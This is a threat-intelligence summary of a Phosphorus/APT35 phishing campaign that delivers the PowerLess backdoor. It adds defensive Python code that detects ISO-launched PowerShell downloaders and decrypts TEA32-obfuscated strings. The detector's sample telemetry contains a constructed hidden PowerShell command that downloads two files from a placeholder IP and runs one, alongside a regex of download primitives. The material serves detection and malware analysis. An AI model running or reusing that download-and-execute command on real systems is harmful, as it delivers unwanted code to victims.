Iranian threat actors linked to the Phosphorus group (also tracked as Charming Kitten/APT35) are targeting Israel with a phishing campaign that delivers a backdoor.
The backdoor, PowerLess, can steal data, take screenshots, record audio, and log keystrokes.
- The infection chain starts with an ISO disk image delivered as the phishing lure.
- It continues when the victim opens the Iraq-themed image files inside the ISO.
- Opening those files runs a loader, which launches the PowerLess implant.
- The ISO also contains decoy text in Arabic, English, and Hebrew and points users to academic content about Iraq from a legitimate NGO, the Arab Science and Technology Foundation, so the victim sees plausible content while the implant runs.
- The chain is completed by a PowerShell script that downloads two files from a remote server and executes them.
- The operators added an extra layer of obfuscation: 13 customized TEA32-based string-decryption functions, which makes recovering the implant's strings harder for analysts.
- Researchers say this new variant has improved loading mechanisms and employs techniques not present in its predecessor.
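The infection chain above (ISO image, a decoy file opened by the user, a loader, then PowerShell fetching two files from a remote server) is the kind of sequence a defender can correlate from process-creation telemetry. The following is an added example, not code from the report or from the threat actor: a small correlation routine over constructed Sysmon Event ID 1-style records. The heuristic for "started from a mounted ISO" (image path on a non-system drive letter, parent explorer.exe), the process IDs, paths and the 203.0.113.10 URLs are all assumptions constructed for illustration.

```python
# Added example (not from the original report): correlate process-creation
# events to flag a PowerShell downloader whose ancestor was launched from a
# mounted disk image volume. Field names follow Sysmon Event ID 1; all
# event data below is constructed sample input.
import re

SYSTEM_DRIVE = "C:"  # assumption: the OS volume; anything else is treated as a mounted image/removable volume

DOWNLOAD_RE = re.compile(
    r"Invoke-WebRequest|\biwr\b|DownloadFile|DownloadString|Start-BitsTransfer|\bcurl\b|\bwget\b",
    re.I,
)
URL_RE = re.compile(r"https?://[^\s'\"()]+", re.I)


def launched_from_mounted_volume(ev):
    """Heuristic for 'user double-clicked something inside a mounted ISO':
    the image lives on a drive letter other than the system drive and the
    parent process is explorer.exe."""
    image = ev["Image"]
    parent = ev.get("ParentImage", "")
    return (not image.upper().startswith(SYSTEM_DRIVE)
            and parent.lower().endswith("\\explorer.exe"))


def is_powershell(ev):
    return ev["Image"].lower().rsplit("\\", 1)[-1] in ("powershell.exe", "pwsh.exe")


def find_iso_download_chains(events):
    """Return one alert per PowerShell process that (a) carries a download
    primitive on its command line and (b) has an ancestor started from a
    non-system volume by explorer.exe."""
    by_pid = {ev["ProcessId"]: ev for ev in events}
    alerts = []
    for ev in events:
        if not (is_powershell(ev) and DOWNLOAD_RE.search(ev["CommandLine"])):
            continue
        pid, seen = ev["ParentProcessId"], set()
        while pid in by_pid and pid not in seen:   # walk up the parent chain
            seen.add(pid)
            anc = by_pid[pid]
            if launched_from_mounted_volume(anc):
                alerts.append({
                    "origin": anc["Image"],
                    "powershell_pid": ev["ProcessId"],
                    "urls": URL_RE.findall(ev["CommandLine"]),
                })
                break
            pid = anc["ParentProcessId"]
    return alerts


# Constructed sample telemetry: a benign shell session plus one malicious chain.
SAMPLE_EVENTS = [
    {"ProcessId": 1000, "ParentProcessId": 800, "ParentImage": r"C:\Windows\System32\userinit.exe",
     "Image": r"C:\Windows\explorer.exe", "CommandLine": "explorer.exe"},
    # user opens a 'photo' inside the mounted ISO (drive E:) -> loader
    {"ProcessId": 1200, "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"E:\Iraq_Photos\photo1.jpg.exe", "CommandLine": r'"E:\Iraq_Photos\photo1.jpg.exe"'},
    # loader spawns PowerShell that fetches two files and runs one
    {"ProcessId": 1300, "ParentProcessId": 1200, "ParentImage": r"E:\Iraq_Photos\photo1.jpg.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": ("powershell.exe -w hidden -ep bypass -c \"$w=New-Object Net.WebClient; "
                     "$w.DownloadFile('http://203.0.113.10/a.dat','C:\\Users\\Public\\a.dat'); "
                     "$w.DownloadFile('http://203.0.113.10/b.dat','C:\\Users\\Public\\b.dat'); "
                     "Start-Process C:\\Users\\Public\\a.dat\"")},
    # benign: an admin running Invoke-WebRequest from a normal shell on C:
    {"ProcessId": 1400, "ParentProcessId": 1000, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -c \"Invoke-WebRequest https://example.org/update.txt\""},
]

if __name__ == "__main__":
    for a in find_iso_download_chains(SAMPLE_EVENTS):
        print(f"ALERT origin={a['origin']} pid={a['powershell_pid']} urls={a['urls']}")
```

The benign admin shell is not flagged because its only ancestor (explorer.exe on C:) never satisfies the mounted-volume heuristic; the malicious chain is flagged and both download URLs are surfaced for blocking. In production the drive-letter heuristic should be replaced by an actual mount signal from the endpoint agent, since the drive letter alone is easily confused with a USB stick or network share.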
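The string-obfuscation point above refers to TEA with 32 cycles used as a per-string decryptor. As an added example, not code from the report or from the malware, here is a minimal TEA32 string encryptor/decryptor of the kind an analyst writes to recover such strings, parameterized on key and delta so that one routine can serve several customized variants. The keys, the alternate delta, the zero-padding scheme and the variant names are assumptions for illustration; the actual parameters of the 13 functions in the sample are not given on this page.

```python
# Added example (not from the original report or the malware): TEA with 32
# cycles ("TEA32") applied to strings in ECB mode, plus a parameterized
# decryptor for several hypothetical per-function variants. Keys, deltas and
# padding are illustrative assumptions.
import struct

DELTA = 0x9E3779B9   # standard TEA constant; customized variants may change it
MASK = 0xFFFFFFFF


def tea_encrypt_block(v0, v1, key, rounds=32, delta=DELTA):
    """Encrypt one 64-bit block (two uint32) with a 128-bit key (four uint32)."""
    k0, k1, k2, k3 = key
    s = 0
    for _ in range(rounds):
        s = (s + delta) & MASK
        v0 = (v0 + (((v1 << 4) + k0) ^ (v1 + s) ^ ((v1 >> 5) + k1))) & MASK
        v1 = (v1 + (((v0 << 4) + k2) ^ (v0 + s) ^ ((v0 >> 5) + k3))) & MASK
    return v0, v1


def tea_decrypt_block(v0, v1, key, rounds=32, delta=DELTA):
    """Inverse of tea_encrypt_block: same schedule, walked backwards."""
    k0, k1, k2, k3 = key
    s = (delta * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - (((v0 << 4) + k2) ^ (v0 + s) ^ ((v0 >> 5) + k3))) & MASK
        v0 = (v0 - (((v1 << 4) + k0) ^ (v1 + s) ^ ((v1 >> 5) + k1))) & MASK
        s = (s - delta) & MASK
    return v0, v1


def encrypt_string(text, key, rounds=32, delta=DELTA):
    """Zero-pad to 8-byte blocks and encrypt block by block (ECB, little-endian words)."""
    data = text.encode("utf-8")
    data += b"\x00" * (-len(data) % 8)
    out = bytearray()
    for off in range(0, len(data), 8):
        v0, v1 = struct.unpack_from("<II", data, off)
        out += struct.pack("<II", *tea_encrypt_block(v0, v1, key, rounds, delta))
    return bytes(out)


def decrypt_string(blob, key, rounds=32, delta=DELTA):
    """Decrypt an ECB TEA blob and strip the zero padding."""
    if len(blob) % 8:
        raise ValueError("ciphertext length must be a multiple of 8")
    out = bytearray()
    for off in range(0, len(blob), 8):
        v0, v1 = struct.unpack_from("<II", blob, off)
        out += struct.pack("<II", *tea_decrypt_block(v0, v1, key, rounds, delta))
    return bytes(out).rstrip(b"\x00").decode("utf-8", errors="replace")


# Hypothetical per-function variants: same algorithm, different key/delta per
# decryption routine. An analyst fills this table from the disassembly so one
# parameterized decryptor recovers strings from every variant.
VARIANTS = {
    "dec_01": {"key": (0x11111111, 0x22222222, 0x33333333, 0x44444444), "delta": DELTA},
    "dec_02": {"key": (0xDEADBEEF, 0x01234567, 0x89ABCDEF, 0x0BADF00D), "delta": 0x61C88647},
}


def recover(variant, blob):
    """Decrypt a blob with the parameters recorded for a given decryptor variant."""
    p = VARIANTS[variant]
    return decrypt_string(blob, p["key"], delta=p["delta"])


if __name__ == "__main__":
    key = (1, 2, 3, 4)
    ct = encrypt_string("powershell -w hidden", key)
    print(ct.hex(), "->", decrypt_string(ct, key))
```

Because the cipher is applied per block in ECB mode, identical 8-byte plaintext chunks produce identical ciphertext chunks, which is often visible in a loader's data section and is one way to spot this kind of string table before the key is known.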